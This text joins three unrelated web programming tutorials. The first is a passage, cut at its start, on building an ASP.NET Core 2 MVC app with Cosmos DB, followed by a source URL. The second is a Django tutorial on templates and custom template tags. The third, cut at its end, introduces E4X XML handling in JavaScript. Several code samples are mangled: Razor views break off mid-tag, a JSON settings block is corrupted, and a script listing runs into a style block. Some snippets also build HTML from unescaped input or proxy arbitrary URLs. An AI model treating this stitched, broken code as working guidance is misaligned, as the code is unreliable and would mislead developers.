using bootstrap, Entity Framework, “install all the things” authentication checkboxes, buttons that manually deploy completely unrepeatable local builds, or any other magic that would get in the way of learning how these things work. Ready? Awesome, let’s go! Task 1: Create the Solution We’ll start with the ASP.Net Core Web Application with the API template (Create new project…). This includes the minimal set of nuget packages we need without creating piles of example and template files we’d have to go through and clean out. Also be sure to not choose an Authentication option. That magic is best left for temporary projects when you’re trying to decode the documentation, but don’t want to accidentally add 100 packages to your real system. Creating an ASP.Net Core 2 Project This template has minimal magic, we get a basic ASP.Net Core 2 website with a single Values API Controller. Let’s lock in this first win by pressing F5 to run the site and verify we have a working API that returns the hard-coded sample values from ValuesController.Get(): ASP.Net Core 2 – Default ValuesController Output Good. It only took a few seconds to verify and now we can move on knowing it works and what port we’re working on. The next step is moving from raw API output to HTML output. Adding the First MVC Page We started with an API project template, but unlike prior versions of ASP.Net it is pretty easy to start adding MVC capabilities. Another alternative would have been . I chose MVC because I have more extensive experience with past versions, reducing the number of unknowns I’ll be working with in this project. Following the expected conventions, let’s add a “Controllers” folder to the project. Then we can use the right-click context menu from there to “Add New Item” and pick an ASP.Net Core Controller Class: ASP.Net Core 2: Add New Item – Controller Class Like earlier versions, a Controller Class is a standard C# class that inherits from Controller, so you also have the option of just creating a basic class and adding the “Controller” suffix and inheritance yourself, for a few less clicks. The default for routing with this project is attribute routing rather than the global route registered in most earlier MVC versions. Add a [Route("")] attribute above the class declaration to route base level “/” paths to this controller. SampleCosmosCore2App/Controllers/HomeController.cs // ... namespace SampleCosmosCore2App.Controllers { [Route("")] public class HomeController : Controller { public IActionResult Index() { return View(); } } } Next we’ll add a Layout.cshtml file that to serve as the general HTML layout for the site. Again we want to match the standard ASP.Net MVC conventions, so first create a top-level folder named Views, then create a folder under this named Shared, then finally right-click this folder to “Add View”, ensure you have Empty Model and no layout selected, with the name “Layout” ASP.Net Core 2 – Add View Dialog Note: if you can’t edit the name of the folder you just added, see if you’re still running in “Debug” and press Stop Once created, edit the Layout.cshtml file to look like this: SampleCosmosCore2App/Views/_Shared/Layout.cshtml <!DOCTYPE html> <html> <head> <meta name="viewport" content="width=device-width" /> <title>Layout</title> </head> <body> @RenderBody() </body> </html> Finally, we’ll create the first view for HomeController. Create a Home subfolder under Views, then right-click and “Add View” again. This time select “Layout.cshtml” as the layout, but continue to leave Model empty. Note: If you haven’t done much MVC in the past, the naming is important because MVC, by convention, will automatically look for views in /Views/ControllerName/ActionName.cshtml when we don’t provide a full path. Warning: Unlike prior versions of MVC, ASP.Net Core 2 is not smart enough to match BlahBlahAsync actions with BlahBlah.cshtml. There is an open bug for this that won’t be addressed until ASP.net Core 3 due to concerns that this would cause breaking changes if added to ASP.Net Core 2. Here we go: /SampleCosmosCore2App/Views/Home/Index.cshtml @{ ViewData["Title"] = "Home"; Layout = "~/Views/_Shared/Layout.cshtml"; } <h2>Home</h2> Time to lock in our winnings again before we move on. Hit F5 and visit the root URL () to verify we have the first task completed successfully. Excellent, time to move on. Task 2: Set Up Source Control The best way to lock in progress is to commit it to source control. This gives us a way to not only save our incremental progress, but also back out of experiments that go awry. For this post, I’m using git with github as a remote repository. Open up a terminal window (I prefer Powershell with the posh-git plugin), and type git init in the root folder of the solution: Initializing a git repository There are a number of files we don’t want to commit and share, such as binaries from the build, user-specific settings in Visual Studio, and so on. We also need to help future us install the right dependencies when we come back to this later. So let’s create a /gitignore for the first and README.md for the latter. I typically start this in the console (powershell again) out of habit: wget -O .gitignore echo "" > README.md One last file to consider is a license statement. You can use choosealicense.com to help pick one and providers like github are pretty smart about providing additional visibility when you use a standard one they recognize. At this point, we’ll also add some minimal info to the README while it’s fresh in our minds. A good start is the name of the project and a section outlining the dependencies so far: # Overview Blah blah, amazing things... # Dependencies * Visual Studio 2017 * ASP.Net Core 2 * .Net Core 2 Finally, we’ll save all this with the first commit as a starting point. Visual Studio includes tooling for git, you can also use third party tools like gitkraken and smartgit, or you can stick to the command-line. I personally use posh-git, which I find to be better than the basic git command-line. So that we don’t get too side-tracked, here’s how I’m going to commit this via command-line: git add -A git commit -m "Initial Commit" -m "ASP.Net Core 2 project with working MVC endpoint, README, and .gitignore" Third Party Git Repo: Github First, log into the git provider (in my case github) and create a repository. Once this is done, the service should give you instructions to connect and push your changes to that remote repository. They’ll look something like this: git remote add origin git@your-provider.com:your-username/your-repo-name.git git push -u origin master You don’t have to use origin as the remote name, but it is a common convention that many providers build some assumptions around in their interface. We’re now safe from losing all your work on your local machine, task 2 is complete successfully! Task 3: Wire in Cosmos DB Now it’s time to figure out how to do some basic tasks with Cosmos DB. This will require obvious things like queries and inserting data, as well as less obvious tasks like figuring out where to record secrets for the local development environment, setting up a local emulator, and more (another reason we’re doing this in bite-size pieces, there’s always surprises). You have the option of using a live Cosmos DB instance in Azure or using the emulator for local development. I prefer emulators for local development, but not all services include them. Download the emulator here: Cosmos DB Emulator Next, I’m going to insist on creating a new project to house my database logic. In some cases this is too early to make architectural decisions like this, but I know from vast personal experience that I have never, ever enjoyed the experience of having this type of logic mixed into my ASP.Net project. This new project is going to be called “SampleCosmosCore2App.Core”. If you haven’t added many projects to solutions, the usual procedure is: - Right click the Solution and select “Add”, “New Project” - Select “Class Library (.NET Core)” - Give it a name and continue Then reference the new project from the ASP.Net one: - Right click the MVC project - Select “Add”, “Reference” and check the box next to the “*.Core” project ASP/.Net Core – Adding Project Reference At this point, I don’t know what I don’t know, so my aim is simplistic, working logic. Once I get that far, I can start looking into repeatable and more production-ready patterns with the context of knowing some basics from my first pass. The goal at this point is to complete a vertical slice, from UI down to back-end data store. I’m using sample data structures because this will be experimental work. Sample data structures help me learn the patterns I’ll use for real data structures, but are incredibly easy to tear out later to make sure I don’t leave behind technical debt from the exploratory stage. I’m going to work with a data class named Sample, so I’ll create a Sample.cs class file and a Persistence.cs class file. The first will be a serializable document, the second the class that handles reading and writing that document to Cosmos DB. Add the Microsoft.Azure.DocumentDB.Core nuget package to your “*.Core” project: Add Microsoft.Azure.DocumentDB.Core package Right click the “Dependencies” folder of the “*.Core” project and search for it, or use the Package Manager Console and type Install-Package Microsoft.Azure.DocumentDB.Core SampleCosmosCore2App.Core (use your project name, not mine). Next, in the SamplePersistence object, we’ll add functions to setup the Sample DocumentCollection in Cosmos and perform common CRUD operations for documents in that collection: SampleCosmosCore2App.Core/Persistence.cs // ... public Persistence(Uri endpointUri, string primaryKey) { _databaseId = "QuoteServiceDB"; _endpointUri = endpointUri; _primaryKey = primaryKey; } public async Task EnsureSetupAsync() { if (_client == null) { _client = new DocumentClient(_endpointUri, _primaryKey); } await _client.CreateDatabaseIfNotExistsAsync(new Database { Id = _databaseId }); var databaseUri = UriFactory.CreateDatabaseUri(_databaseId); // Samples await _client.CreateDocumentCollectionIfNotExistsAsync(databaseUri, new DocumentCollection() { Id = "SamplesCollection" }); } // ... If you’re not familiar with Document Databases, you can think of this DocumentCollection as a table, except instead of a single row that fits a very strict schema we can add any structured document we want and search against them later, letting the database handle the heavy lifting if we have vastly different and/or deep document structures. And a data object like so: SampleCosmosCore2App.Core/Sample.cs public class Sample { [JsonProperty(PropertyName = "id")] public string Id { get; set; } public string Content { get; set; } } Each document in Cosmos DB will have an id property and, by default, it will generate that id value for us when we add a new document. The JsonProperty above: Cosmos DB serializes with the same case you use in your call, by default. We want this Id to bind to the one Cosmos DB will create on the document, so we tell it to serialize/deserialize Id as id . Alternatively, you can override the default casing with JsonSerializerSettings via the DocumentClient constructor to set JSON.Net’s NamingStrategy for the SDK client. Returning to the Persistence class, we’ll add some basic CRUD operations to Save, Get, and Get All: SampleCosmosCore2App.Core/Persistence.cs // ... public async Task SaveSampleAsync(Sample sample) { await EnsureSetupAsync(); var documentCollectionUri = UriFactory.CreateDocumentCollectionUri(_databaseId, "SamplesCollection"); await _client.UpsertDocumentAsync(documentCollectionUri, sample); } public async Task<Sample> GetSampleAsync(string Id) { await EnsureSetupAsync(); var documentUri = UriFactory.CreateDocumentUri(_databaseId, "SamplesCollection", Id); var result = await _client.ReadDocumentAsync<Sample>(documentUri); return result.Document; } public async Task<List<Sample>> GetSamplesAsync() { await EnsureSetupAsync(); var documentCollectionUri = UriFactory.CreateDocumentCollectionUri(_databaseId, "SamplesCollection"); // build the query var feedOptions = new FeedOptions() { MaxItemCount = -1 }; var query = _client.CreateDocumentQuery<Sample>(documentCollectionUri, "SELECT * FROM Sample", feedOptions); var queryAll = query.AsDocumentQuery(); // combine the results var results = new List<Sample>(); while (queryAll.HasMoreResults) { results.AddRange(await queryAll.ExecuteNextAsync<Sample>()); } return results; } // ... This provides all the persistence methods we need, now we can move up to the ASP.Net project and add in the Controller actions and views. Again, I’m in experimental mode, so I’m making sure the database and DocumentCollection exist on every call, but later I’ll find a better pattern for this. Dependency Injection is built into ASP.Net Core, so to make an instance of this new Persistence class available to Controllers we can register it in Startup.cs like so: SampleCosmosCore2App/Startup.cs services.AddScoped<Persistence>((s) => { return new Persistence( new Uri(Configuration["CosmosDB:URL"]), Configuration["CosmosDB:PrimaryKey"]); }); Then in our local development config we’ll add the emulator URL and Primary Key: SampleCosmosCore2App/appsettings.Development.json { // ... "CosmosDB": { "URL": "", "Primary==" } } I’ve used a Scoped service so that a fresh Persistence object will be created for each Request. This will result in a fresh DocumentClient created on each request further down the stack, which is a safe starting point when I’m working with something new that I haven’t dug too deep on yet. Later on, we’ll start taking a more real approach to this and find out that Microsoft provides performance guidance that says we should instead create this as a singleton. Next, we need Controller Actions to show the list of Sample values, Create a new one, Edit one, and Post edited contents to be saved. To keep this simple, we can wire these to two Views: a list of all of the items and an editable display of one. SampleCosmosCore2App/Controllers/HomeController [Route("")] public class HomeController : Controller { private Persistence _persistence; public HomeController(Persistence persistence) { _persistence = persistence; } [HttpGet()] public async Task<IActionResult> IndexAsync() { var samples = await _persistence.GetSamplesAsync(); return View("Index", samples); } [HttpGet("Create")] public IActionResult Create() { var sample = new Sample() { }; return View("Get", sample); } [HttpGet("{id}")] public async Task<IActionResult> GetAsync(string id) { var sample = await _persistence.GetSampleAsync(id); return View("Get", sample); } [HttpPost()] public async Task<IActionResult> PostAsync([FromForm] Sample sample) { await _persistence.SaveSampleAsync(sample); return RedirectToAction("IndexAsync"); } } Here are the notable changes: - We’ve added Persistenceas a necessary dependency in the Controller - We’ve switched all Actions to asyncto support the Persistencemethods IndexAsyncgets the list of Samples and displays them in the “Index” view Createconstructs a new Sampleand displays it in the editable “Get” view GetAsyncdoes the same thing, but loads the Samplefrom Persistencefor the passed {id}in the route Sample, saves it via Persistence, and redirects back to showing the whole list You can easily generate a scaffolded view for these by right-clicking in an Action above and selecting “New View”. Pick the List or Edit templates as a starting point, with the model class set to the Sample object. Because we started from a blank slate, these templates won’t work directly out of the box (stackoverflow). Add a file _ViewImports.cshtml to register the tag helpers: SampleCosmosCore2App/Views/_ViewImports.cshtml @addTagHelper *, Microsoft.AspNetCore.Mvc.TagHelpers The scaffolded views also assume we’re using bootstrap and include 2-3x more HTML than we actually need, so we can trim them down quite a bit: SampleCosmosCore2App/Views/Get.cshtml @model SampleCosmosCore2App.Core.Sample @{ ViewData["Title"] = "GetAsync"; Id: @Model.Id <input asp-<br /> Content: <input asp-<br /> <input type="submit" value="Save" /> </form> <a asp-Back to List</a> SampleCosmosCore2App/Views/Index.cshtml @model IEnumerable<SampleCosmosCore2App.Core.Sample> @{ ViewData["Title"] = "View";Create New</a> </p> <table class="table"> <thead> <tr> <th> @Html.DisplayNameFor(model => model.Id) </th> <th> @Html.DisplayNameFor(model => model.Content) </th> <th></th> </tr> </thead> <tbody> @foreach (var item in Model) { <tr> <td> @Html.DisplayFor(modelItem => item.Id) </td> <td> @Html.DisplayFor(modelItem => item.Content) </td> <td> @Html.ActionLink("Edit", "GetAsync", new { id=item.Id }) </td> </tr> } </tbody> </table> And now we have a very simple CRUD interface: ASP.Net Core 2 – Basic CRUD Interface to Cosmos DB Add and edit some items to make sure it’s working, then commit the changes to lock it in. We now have a complete vertical slice from the UI down to the Cosmos DB store! Looking Forward Almost none of this code will likely live to still be in the final app, but we’ve completed several steps forward: - We can serve up HTML and API content - We’ve got some basic CRUD logic with Cosmos DB - We have source control and a basic README Next we’ll add general login and registration capabilities. This will continue the foundation by helping us figure out Authentication for the system, but also add some real data needs to our Cosmos DB so we can start identifying a good pattern for that persistence logic.
http://ugurak.net/index.php/2018/05/07/asp-net-core-2-w-cosmosdb-getting-started/
CC-MAIN-2018-47
refinedweb
3,080
54.63
Section 8.6 References, Aliasing, and Immutable Objects In Java, variables whose type is a class are always references to the corresponding object. Consider the following example: public class Foo { int x; int y; public static void main(String[] args) { Foo a = new Foo(); a.x = 3; // from here on, a and b alias Foo b = a; b.x = 5; System.out.println(a.x); // prints 5 System.out.println(b.x); // prints 5 // from here on, a and b no longer alias b = new Foo(); b.x = 3; System.out.println(a.x); // prints 5 System.out.println(b.x); // prints 3 } } aand bfrom the example code in memory. When, at some point in time, an object has two references \(a\) and \(b\) referring to it, we say that \(a\) and \(b\) alias (or that they are aliases). In the above example, a and b are aliases of the same object between the corresponding comments. Subsection 8.6.1 Aliases A benefit of using references is that they can be implemented with a compact memory footprint. The compiler typically translates them to an address to main memory, where the object's fields are located. For copying (as it also implicitly happens at a method call), only an address needs to be copied, rather than the entire object. However, multiple references to the same object at the same time can lead to program errors that are difficult to find. The problem is that mutating objects through aliases often opposes modularity: If we, for example, write a method that modifies an object \(O\text{,}\) a caller of the method needs to be aware of the fact that there may be other objects that refer to \(O\) and whether they can “handle” a potentially modified object. This awareness may require knowledge about other parts of the system and therefore is often not modular because the program's correctness then depends on the correct interplay of multiple objects (of potentially different classes). Subsection 8.6.2 Immutable Classes One way to avoid errors caused by aliasing is to make classes immutable. This ensures that the values of the object's fields cannot change after the object is constructed. Consequently, aliasing references cannot modify the objects anymore. Copying the reference to an immutable object is therefore conceptually equivalent to copying it by value. Java supports enforcing immutability with the keyword final: public class Vec2 { private final double r, phi; public Vec2(double r, double phi) { this.r = r; this.phi = phi; } ... } final fields of a class must receive a value in the constructor once. The Java compiler rejects any code that would modify a final field of an object at compile time. However, this immutability is also enforced for methods of the class, like the translate method in our example. For immutable classes, such a method needs to instead return a new, modified object rather than modifying the existing one: public class Vec2 { ... public Vec2 translate(double dx, double dy) { return cartesian(getX() + dx, getY() + dy); } public static Vec2 cartesian(double x, double y) { double phi = Math.atan2(y, x); double r = x / Math.cos(phi); return new Vec2(r, phi); } } The method cartesian here serves the purpose of preparing the arguments for the constructor call, i.e., to transform the cartesian coordinates to polar coordinates. This method is marked with the static keyword. It therefore forgoes the implicit this parameter and can be called independent of a specific Vec2 object. The static method is merely declared in the namespace of Vec2. Such a particular static method, that only creates new objects, is also called a factory method. Subsection 8.6.3 When to Use Immutable Classes? Which classes should be made immutable and which should not needs to be decided on a case-by-case basis. Since we need to replicate instead of modify objects when we work with immutable classes, this can lead to allocating and initializing a large number of objects. Such operations cost time and memory. A class Image that represents a graphical image is for instance not a likely candidate for immutability: Assume the image has \(1000\times 1000\) pixels and every pixel requires four bytes. A single image then requires four megabytes of space. If we want to change a pixel in such an image, it is a bad idea to copy \(999,999\) pixels to create a new image. The following table summarizes the advantages and disadvantages of immutable vs mutable objects: Remark 8.6.2. Many important classes in Java are immutable and use tricky implementations to reduce the inefficiency introduced by copying objects. A prominent example is String.
https://prog2.de/book/sec-java-immutable.html
CC-MAIN-2022-33
refinedweb
773
55.13
trqStaff Alumni Content count30,999 Joined Last visited Days Won26 Community Reputation255 Excellent About trq - RankProlific Member - Birthday 06/12/1975 Profile Information - GenderMale how to make my website fast ? trq replied to yhi's topic in OtherThe simplest way to gain request-start to request-end speed is to cache using something like akamai. namespace autoloader for custom api trq replied to rwhite35's topic in Application DesignComposer ships with an autoloader, just stick to one of the standards and use that. PHP developer section trq replied to spencer9772's topic in Application Designlike wtf? - The point I'm trying to make is why have the rewrite at all if you're just going to use normal querystring parameters? I understand you want to force everything through a front controller, but why stop there? But yeah, you could just use the QSA flag to have apache append existing parameters. RewriteRule ^(.*)$ index.php?uri=$1 [PT,L,QSA] - That rewrite rule removes the need for typical GET parameters by making your urls "pretty". So instead of this: users/activate-account?email_address=test&token=test You would use something more like: users/activate-account/test/test Of course then you need some sort of "router" to parse and handle these parameters for you. If this is your own framework you need to decide how your urls are going to be formed. Alternatives to $_GLOBALS trq replied to NotionCommotion's topic in PHP Coding HelpWhy? The only reason to do this is laziness. It is making your code tightly coupled to whatever this "god" object is. A controller has no interest in your connection settings for instance. Objects should be passed their dependencies (and only their dependencies) at construction time. Most frameworks handle this in an easy to manage manor by providing a configurable dependency injection container which allows you to configure how objects are to be created. Rookie needs help - filtering path? trq replied to HansDampfHH's topic in Regex HelpYou don't need a regex unless you actually need to match a pattern.. <?php if (substr_count($path, '/') > 2) { echo "Directories too deep"; } Cronjob and insert content in site trq replied to vinsb's topic in PHP Coding HelpWhy would you edit the index.php file? PHP is a programming language, you can use it to dynamically display data from different data sources. Having cron dynamically alter the PHP "script" is ridiculous. Instead, have your cron job put the data somewhere PHP can easily access it (like a database) and then write some logic into your php script to retrieve this data and display it. Efficient portable PHP development environment? trq replied to Abuda's topic in PHP Installation and ConfigurationDefine "portable". Where is anti-formatting performed? trq replied to NotionCommotion's topic in PHP Coding HelpThere should be zero business logic in controllers. They are nothing but a very thin layer between http and your domain. Storing articles on GitHub trq replied to Stefany93's topic in MiscellaneousYes they will be indexed by google. Does anyone know about this error? trq replied to eramge11's topic in PHP Coding HelpThat is not a standard php error. Both CDbException & CDbCommand are part of your code base. Mods4u trq replied to eggbid's topic in MiscellaneousWhat? Detecting Mobile Handset Script trq replied to Jetheat's topic in Third Party ScriptsWhy would you care what mobile a client is using? Making configuration changes in Joomla trq replied to Season's topic in PHP Installation and ConfigurationThere is no need to restart the machine, just the http server. sudo /etc/init.d/nginx restart
https://forums.phpfreaks.com/profile/19189-trq/
CC-MAIN-2018-43
refinedweb
600
55.34
Tutorial for: Django. As you may know, all the actual content on this website, including this here tutorial is build using a Django template. The template for this tutorial is stored in a Database table and rendered out when it is displayed. Of course I cache the result to limit the amount of times the database is queried. I will talk about caching in templates in my next tutorial, but this one will focus on how to custom the template engine for your particular requirements. Depending on what type of web application you are creating, you may use templates to embed snippets of HTML from another file with a special context, use a tag to grab some extra data about an object from the database for the user, or perhaps use it to render special forms in specific places on your website. Whatever your web application may be, it will more than likely make your task a lot easier if you created tags for most used components on the site. Here is a very simple mock template of a base page, what this blogs base page is, without all the extra formatting. I separated each component of the site into different files to more easily edit them when I need to. Since they are static data, which rarely ever changes, it's safe to put them into a separate HTML file. <html> <head> <title>Python Diary | {% block title %}{{title|default:"Untitled page"}}{% endblock %}</title> </head> <body> {% include "site-nav.html" %} .... {% block body %} {% endblock %} .... {% include "aboutme.html" %} {% include "tags.html" %} {% include "archive.html" %} </body> </html> Pretty straightforward? You will notice the title section is able to take a title from either a subclassed block, or a context variable. I know sub-templates are not subclassed templates, but that's how I like to picture them, as in essence that's really how an extended template works. Here is a very simple entry template: {% extends "base.html" %} {% block body %} .... {% endblock %} A better method of building your base template, would be to add blocks in the head section, so that you can easily add new CSS or JavaScript blocks. This is extremely helpful for dynamic websites which use a lot of complex styling or jQuery functions. Now lets talk about template tags, and how to build a custom one with a useful purpose. The first thing you should ask yourself, can I add a new method to my model to do the same function? I say because, adding a new method to a model is much more transparent and object-oriented. Here is a very simple template which uses the most widely used model function in Django: <a href="{{article.get_absolute_url}}">{{article}}</a> Remember, that all get_absolute_url is, is a model class method. Interesting enough, all of a model classes methods can be accessed from a Django template. It's main purpose is to access the fields of the model, rather than the methods. Accessing the methods is a most welcomed side-effect, that proves very useful when building applications. Lets create an Article model, and I will show you what else can be performed using it's methods in templates. class Article(models.Model): title = models.CharField(max_length=80) slug = models.SlugField() content = models.TextField() published_on = models.DateTimeField() author = models.ForeignKey(User) categories = models.ManyToManyField(Category) @models.permalink def get_absolute_url(self): return ('view-article', [self.slug]) @models.permalink def get_author_url(self): return ('view-author', [self.user.username]) This is a simple example which only generates URLs for the template or any other part of your application to use. A method can also do calculations, or return a True/False value which can be used in the template systems if block. An example of a calculation would be for a billing system, where it can tally up the price of all services on an invoice and add taxes. This data doesn't need to be stored in the database, as it can be calculated at runtime when needed. Here is a simple Invoice model: class Invoice(models.Model): customer = models.ForeignKey(User) services = models.ManyToManyField(Service) def total(self): result = Decimal(0.00) for service in self.services.all(): result += service.cost return result * 1.14 A template can easily place in invoice.total, even though it is not a field in the database, but rather a method on the model. You can add most of the model's Business logic directly in the model itself. This method can also be used anywhere in the application, for when you actually send the total to your credit card processor for payment. This example is very simple, and more than likely needs more fields in a real world scenario to actual work. Okay, now that we got that out of the way. Let me explain how to add new template tags, which can easily extend what the Django template engine can do. Something you may wish to have in a template tag, is an easy way to render a form which is used in various sections of the site, but not everywhere. The Django comments framework uses a similar template tag to render the comments form. from django import template from forms import SimpleForm register = template.Library() register.inclusion_tag("simple_form.html") def simpleform(): return {'form':SimpleForm()} This will essentially render a form where ever you place the tag simpleform in your template. Follow the Django documentation for how to create the template library and how to load it into a template. This next example will take something I do on this blog a lot, create links to packages from inside my templates. You should notice links like: Django, all over this website. Here is how it's done: from django import template from pkglist.models import Package register = template.Library() @register.simple_tag def package(slug): pkg = Package.objects.get(slug=slug) return '<a href="%s">%s</a><a href="%s" rel="tooltip" title="Direct link"><i class="icon-bookmark"></i></a>' % (pkg.get_absolute_url(),pkg,pkg.website) I use caching on the actual template to make sure each lookup in the database is kept to a minimum. Also, there is no checking done here to see if the package exists, I left this out for simplicity. Here is a template tag which I used in a few of my tutorials, which may help others out there who are building Django sites with YouTube functionality: @register.simple_tag def youtube(slug): return '<iframe width="420" height="315" src="" frameborder="0" allowfullscreen></iframe>' % slug This can also be done using an inclusion tag. I will not dive into complex templates in this tutorial, ones which do not use the shortcuts. This YouTube example is a great example on how powerful the template system can be, if you just think of common tasks you normally perform, but want to simplify it's inclusion. One could also make this YouTube tag fetch meta data from a database to be displayed as well. This ends the template tutorial for now. My next tutorial in this set will focus on urls.py and templates, and how to make every component in Django work together well to ease the development process. You really should never hardcode URLs into your templates, and my next tutorial will go through all the ways of properly adding URLs in templates for various purposes.
http://pythondiary.com/tutorials/making-django-templates-work-you.html
CC-MAIN-2015-22
refinedweb
1,225
65.22
Introducing E4X November 30, 2007 Exploring E4X. Creating E4X Objects" Assigning to E4X Objects One of the coolest aspects of E4X is the power exposed by assignments. Indeed, you can use assignment to quickly build XML structures from scratch, change values on the fly and add and remove new content quickly. Consider, for instance, the nascent phone book discussed here. The following shows how you can create a new phone book with a single entry: var phoneBook = <phoneBook/>; phoneBook.phoneEntry = new XMLList(); var phoneEntry = <phoneEntry/>; phoneEntry.name = "Jeane Tomasic"; phoneEntry.phoneNumber = "123-4567"; phoneBook.phoneEntry += phoneEntry; print(phoneBook); =><phoneBook> <phoneEntry> <name>Jeane Tomasic</name> <phoneNumber>123-4567</phoneNumber> </phoneEntry> <phoneBook> The second statement— phoneBook.phoneEntry = new XMLList();—indicates that any time phoneBook.phoneEntry is used as an L-Value (is on the left side of an assignment statement) it should be treated as a list (for reasons to be covered momentarily). The next three lines create an individual entry. When an XML() object has a new name (such as .name or .phoneNumber) appended to it, that name will be treated as a new element with that name, holding the value calculated from the right side of the equation. This is similar to the way that objects (as hashes) work, but in the case of objects, what are created are hash keys and values rather than elements and text children as is the case for E4X. The statement phoneBook.phoneEntry += phoneEntry is, frankly, just cool. It adds the new phoneEntry object thus created to the phoneEntry list. Note that the element name of the added object MUST correspond to the name of the list or this throws an exception. However, in some cases, you may have multiple types of items being added to a given element. In this case you can use a wild card character as the list name, with no need to declare the entity. var html = <html/>; html.head.<![CDATA[ h1 {font-weight:bold;} ]]></style>; html.body.* = new XMLList(); html.body. h1 { font-weight:bold; }</style> </head> <body> <h1>A new XML Document</h1> <p>This is the first paragraph.</p> <p>This is the second paragraph.</p> <ul> <li>This is item 1</li> <li>This is item 2</li> </ul> </body> </html> This sequence makes a quick web page, doing a few rather subtle tricks to do so. The first is the implicit creation of nodes; the statement html.head.title = "A new XML Document" first checks to see if a <head> element is defined. Since one isn't, the E4X core automatically creates it before making the <title> child element to it. In the next statement, a CDATA block is used to add content that will not be parsed (avoiding the parsing of the CSS rule contained within the <style> element). The statement html.body.* = new XMLList(); tells the E4X object that if new items are added to the * object (a wild card) these should be assumed to be added as a child to the list contained by the <body> element. This can be overridden explicitly (the <h1> statement does just this), but normally when objects are added via the += operator, they will then be added to the list in the order assigned. Thus, html.body.* += <p>This is the first paragraph.</p> adds a new paragraph to the body, the next statement adds a second paragraph to the body and so forth. The <ul> statement represents this same principle in miniature, and shows how you can add pieces to a larger structure without having to carry around the reference node. The benefit of this approach is somewhat limited if you're just building an XML or XHTML structure - it's probably more efficient to just use a regular XML editor. However, this approach can come into its own when you're trying to combine XML and JavaScript. For instance, suppose that you had an object version of the phone book and you wanted to create a table showing the names and numbers of each person in the book. You can combine the above approach with JSON iteration to quickly create the table: var _phoneBook= {phoneEntry:[ {name:"Joe Schwartz",phoneNumber:"342-2351"}, {name:"Aleria Delamare",phoneNumber:"342-7721"}, {name:"Susan Sto Helit",phoneNumber:"315-2987"}, {name:"Kyle Martin",phoneNumber:"342-7219"} ]}; var table = <table/>; table.tr = new XMLList(); table.tr.th= new XMLList(); table.tr.th += <th>Name</th>; table.tr.th += <th>Phone Number</th>; for each (var entry in _phoneBook.phoneEntry){ table.tr += <tr> <td>{entry.name}</td> <td>{entry.phoneNumber}</td> </tr> } print(table); => <table> <tr> <th>Name</th> <th>Phone Number</th> </tr> <tr> <td>Joe Schwartz</td> <td>342-2351</td> </tr> <tr> <td>Aleria Delamare</td> <td>342-7721</td> </tr> <tr> <td>Susan Sto Helit</td> <td>315-2987</td> </tr> <tr> <td>Kyle Martin</td> <td>342-7219</td> </tr> </table> Once created, the table can then be added into an existing element via the innerHTML property. It's also possible to remove an item from an existing E4X object via the delete command. For instance, to remove the third item (Susan Sto Helit) from the table you just created, you simply use the command: delete table.tr[3] though a warning here is in order, unlike other XML technologies such as XPath, E4X is zero based, so that table.tr[3] is actually the fourth row in the table, but the first row is the header, bumping the index up one. If you wanted to exclude the header row, you'd use table.tr.(td)[3], as discussed below. Iterations and Filters This use of iterating through an object represent another area where E4X equalizes the field. One advantage that JSON has over DOM is the fact that iterations in JSON are very straightforward, while they are cumbersome and awkward in DOM. However, E4X was designed specifically with iterations in mind, and in some respects is considerably more efficient than JSON in that regard. For instance, suppose that you wanted to look through a set of phone numbers to find the ones that are in the "342" local exchange (the first three numbers of the seven digit version of the telephone number). Both JSON and E4X would render this as for each (phoneNumber in phoneNumbers.phoneNumber){ if (phoneNumber.indexOf("342")==0){print(phoneNumber);} } However, suppose that you had a more complex structure, of the form: phonebook phone-entry name phone-number In XML this might be an instance of the> while as an object, this same list would be given as: { phoneEntry:[ { name:"Joe Schwartz", phoneNumber:"342-2351" }, { name:"Aleria Delamare", phoneNumber:"342-7721" }, { name:"Susan Sto Helit", phoneNumber:"315-2987" }, { name:"Kyle Martin", phoneNumber:"342-7219" } ]} To retrieve a list of all of the phone entries for a given exchange, the E4X format would be given as: for each (entry in phoneBook.phoneEntry.(phoneNumber.indexOf("342")==0)){ print(entry.name+":"+entry.phoneNumber); } while the equivalent object based entry becomes: for each(entry in _phoneBook.phoneEntry){ if (entry.phoneNumber.indexOf("342")==0){ print(entry.name+":"+entry.phoneNumber); } } This subtle difference can add up when you're dealing with dozens or hundreds of entries, as the E4X is performed as a binary filtering, whereas the pure object equivalent is handled as a script call. The more complex the conditional filter(s), the more the advantage shows up in favor of E4X. Additionally, because E4X is a set-based language, the above can be rendered as: var entries = phoneBook.phoneEntry.(phoneNumber.indexOf("342")==0); for each (entry in entries){ print (entry.name+":"+entry.phoneNumber); } To do this in object-based JavaScript requires that you create a list and populate it: var _entries = []; for each (var entry in _phoneBook.phoneEntry){ if (entry.phoneNumber.indexOf("342")==0){ _entries.push(entry) } } for each (entry in _entries){ print (entry.name+":"+entry.phoneNumber); } giving you four lines vs. nine. Other than the rather annoying inability for an element to reference itself in a filter (the part contained in an expression such as the following, shown in bold): phoneBook.phoneEntry.(phoneNumber.indexOf("342")==0) the E4X code for filtering (using JavaScript expressions relative to a given context) is generally considerably more intuitive and usually terser than the equivalent expressions with JavaScript objects. Building a Feed Application with E4X Perhaps one of the biggest benefit of using E4X stems from the fact that most database systems (and consequently many web sites) are now moving towards producing XML content natively, whereas relatively few are doing the same thing with JSON feeds (which consequently need to be crafted by hand). Consider, for instance, the process of retrieving an XML-based Atom feed from my blog (at) to retrieve the titles of each entry in the feed, and place them as options in a select box, as shown in Listing 1. Listing 1. Showing Metaphorical Web Atom Feeds <html xmlns=""> <head> <title></title> <script type="application/x-javascript"><![CDATA[ var populate=function(selectId,displayId,linkId,feed){ var http = new XMLHttpRequest(); var<![CDATA[ #display {width:600px;height:400px;overflow-y:auto; border:solid 2px gray;padding:5px;-moz-border-radius:8px; background-color:#ffef80;} h1 {font-size:18pt;font-family:Times New Roman;} h2 {font-size:14pt;font-family:Times New Roman;font-style:italic;} ]]></style> </head> <body onload="populate('s1','display', '')"> <h1>Metaphorical Web</h1> Article: <select id="s1"/> <a href="" id="link" target="new">Open</a> <br/> <div id="display">Select an article to review.</div> </body> </html> This particular function relies upon a server "router" for passing feeds, in this case a short eXist database XQuery called feed.xq called as a web service which takes the URI passed as part of a "path" parameter and retrieves the document associated with it: (: feed.xq :) declare namespace atom=""; declare namespace h=""; let $path := request:get-parameter("path","") let $doc := httpclient:get(xs:anyURI($path),false(),<headers />) return $doc This exercise is also making the implicit assumption that the syndication feed is in Atom format, though the same basic rules apply for most XML-compliant RSS 2.0 feeds. In this particular example, when the document initially loads, it asynchronously retrieves the atom feed from the server via the 